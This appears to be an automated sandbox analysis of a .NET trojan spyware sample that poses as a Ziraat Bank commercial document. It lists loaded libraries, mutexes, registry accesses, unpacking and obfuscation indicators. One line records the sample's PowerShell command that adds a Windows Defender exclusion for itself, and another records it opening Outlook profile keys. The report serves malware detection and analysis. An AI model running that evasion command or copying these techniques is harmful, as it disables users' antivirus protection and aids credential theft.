Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, xeQC5ayUf3TpgtdV4u.cs Security API names: _0020.SetAccessControl
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, xeQC5ayUf3TpgtdV4u.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, xeQC5ayUf3TpgtdV4u.cs Security API names: _0020.AddAccessRule
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, fABkfU3Z8awbXM3bZr.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, xeQC5ayUf3TpgtdV4u.cs Security API names: _0020.SetAccessControl
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, xeQC5ayUf3TpgtdV4u.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, xeQC5ayUf3TpgtdV4u.cs Security API names: _0020.AddAccessRule
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, fABkfU3Z8awbXM3bZr.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/6@4/3
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.log Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Mutant created: NULL
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Mutant created: \Sessions\1\BaseNamedObjects\VhLqpfcHqWZ
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5448:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_namqra0d.f00.ps1 Jump to behavior
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe ReversingLabs: Detection: 32%
Source: unknown Process created: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe"
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe"
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process created: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe" Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process created: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe" Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: RRye.pdb source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
Source: Binary string: RRye.pdbSHA256 source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.53d0000.5.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, xeQC5ayUf3TpgtdV4u.cs .Net Code: Flwu4yWCJq System.Reflection.Assembly.Load(byte[])
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, xeQC5ayUf3TpgtdV4u.cs .Net Code: Flwu4yWCJq System.Reflection.Assembly.Load(byte[])
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.28edd60.1.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.28e4748.0.raw.unpack, JK.cs .Net Code: ve System.Reflection.Assembly.Load(byte[])
Binary contains a suspicious time stamp
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Static PE information: 0xC125EA6D [Wed Sep 7 15:25:33 2072 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F39695 push es; iretd 3_2_06F39698
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F344E8 push eax; iretd 3_2_06F344E9
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F38BCD push es; retf 3_2_06F38BD0
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3C899 push es; retf 3_2_06F3C8A0
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Static PE information: section name: .text entropy: 7.823687810026105
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.53d0000.5.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, fABkfU3Z8awbXM3bZr.cs High entropy of concatenated method names: 'XbyQf6YqD1', 'HOIQrGTJCy', 'tStQwc9pxB', 'VGjQK9oK6g', 'QF6QPc9Aqm', 'PREQVJvZkX', 'ztGQEF1D3a', 'nlVQMc27hA', 'BRmQ5ytT2u', 'eTsQFhblXX'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, aOwyEqwyrju2kXFDoT.cs High entropy of concatenated method names: 'ToString', 'RpEkLK9qWF', 'IjNk0oMMI8', 'Vk4kJfTe5g', 'qPLkWvHuNe', 'IockoeZTwU', 'o7AkXNvs69', 'xXmkCaH8Tx', 'pXJkvceUps', 'z5bk7dpQba'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, qDFOWtG9VuR5pdyc2O.cs High entropy of concatenated method names: 'h9om3XPIBf', 'XlHmpe2i8U', 'SCGmHMs6On', 'T0Ym0UsEtC', 'LpGmW2QLqy', 'bSsmo268mH', 'LURmC7kBjg', 'LjHmv0qQuV', 'MKfmdLMmTe', 'DgEmLJtyS7'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, oZUwic70lEwBnIGtjJ.cs High entropy of concatenated method names: 'OlOhiopZq2', 'YmdhIKa9HC', 'e5fh4xfBA7', 'wrJhZ0ImwD', 'iXgheRr01y', 'RL6hxaGjmw', 'mQuhBeVAGy', 'kvAh3Yvj79', 'cwmhp2uarV', 'ul6hbbxhBq'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, MREV3Spms4ghM97Z3I.cs High entropy of concatenated method names: 'ClvgZwrpfI', 'xdZgxtfJfF', 'Mv3g31pK3Y', 'mMfgp0JTkx', 'GdqglUrcaP', 'mqxgk6yCwF', 'wohgNfWmy6', 'VQfgc4PWXv', 'MHSgDGPK5G', 'iVvg6AsENk'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, if2je5AfxZ9xybvf7q.cs High entropy of concatenated method names: 'Rpw4kmk6R', 'rC3ZgrbpA', 'ArRxbbEiN', 'kWZB2qvv7', 'CNcpPqYFQ', 'DWfbNGeEF', 'T9Hmvux29ao9X06RBZ', 'q57UkcSVnXqZtxWQLR', 'GF8SeptpciuQZyjV8c', 'Easc451Ic'
